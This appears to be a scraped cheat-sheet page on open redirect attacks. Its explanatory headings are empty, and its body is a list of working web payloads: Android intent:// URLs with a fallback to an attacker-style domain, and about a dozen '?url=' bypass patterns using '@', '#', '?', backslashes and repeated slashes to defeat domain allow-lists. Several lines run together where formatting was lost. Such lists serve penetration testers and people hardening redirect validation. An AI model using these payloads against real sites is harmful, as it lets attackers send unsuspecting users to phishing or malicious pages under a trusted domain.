Open Redirect
What is it?
Exploitation
Example Payloads
http://evilwebsite.com/xss.php?redir_xss=intent://anyhostname.com/anypath?etc#Intent;package=x;S.browser_fallback_url=https://envil.website;end;%20
Shorter payload:
intent://anyhostname.com#Intent;scheme=evil.website;endCheat sheet
Basic Attack [ref1]
?url=https://www.hahwul.comOpen Redirect bypass pattern
?url=https://allow_domain.hahwul.com
?url=https://[email protected]
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.comOther Resources
References
Last updated